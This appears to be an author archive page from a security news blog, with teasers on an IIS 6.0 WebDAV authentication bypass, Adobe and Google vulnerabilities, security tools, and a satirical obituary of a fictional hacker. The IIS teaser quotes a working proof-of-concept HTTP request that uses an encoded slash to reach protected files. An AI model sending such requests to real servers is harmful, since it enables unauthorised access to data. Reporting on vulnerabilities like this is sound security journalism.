Author Archive
IIS 6.0 WebDav Exploit, Adobe 8-9.1 JavaScript Exploits, Cisco Works TFTPD Directory Traversal
Microsoft IIS 6.0 with Webdav is vulnerable to an authentication bypass vulnerability. The exploit has already been made public:
http://www.milw0rm.com/exploits/8704
Proof of concept taken from above URL:
GET /prot%c0%afected/protected.zip HTTP/1.1
Translate: f
Connection: close
Host: servername
Adobe version 8-9.1 have been smacked with more JavaScript command execution bugs. A lot of vendors are starting to recommend disabling JavaScript, something I suggested back [...]
Universal XSS Vulnerability in Google
It does worry me when Google services gets hacked with a Cross Site Scripting vulnerability that compromise just about everything.
Inferno released an advisory in Bugtraq stating that he discovered a method of exploiting the following Google items (to name a few):
1. Steal your emails.
2. Steal your contacts.
3. Steal your documents.
4. Steal your code.
5. Steal your [...]
TCP/IP Security Assessment, FreeBSD Telnet 0-Day, RainbowCrack 1.3, Nokia N95 DoS, Bounty for Worm Author
TCP/IP Security Assessment
The United Kingdom’s Centre for the Protection of National Infrastructure has just released the document “Security Assessment of the Transmission Control Protocol (TCP)”.
I find the document title a little ambiguous, as a security assessment generally refers to active research where from my brief overview, is in fact more of a whitepaper giving an [...]
Hacker News: Backtrack 4 Beta, Web Services Testing, Monster Hacked and More
Backtrack 4 BETA released
The guys at Backtrack have released Backtrack 4 BETA. Cool changes include Kernel 2.6.28.1 with better hardware support, Pico e12, e16 support, better wireless injection support, RFID support and a bunch of new tools.
Fasttrack security tool gets spotlight
David Kennedy’s Fasttrack tool got high reviews after Shmoocon. It provides CLI and a cool [...]
IWAS-P Hero Dies Before Conference
GOLD COAST, Austrailia— Many mourned upon hearing that famous super hacker, Bruce Blubber, 21, had died before giving his his long awaited talk, “He’s just not that into you”.
Close friends made the effort to poke his Facebook profile with messages of love and condoleances to his friends and family. One friend, Kevin, repeatedly superpoked him. [...]
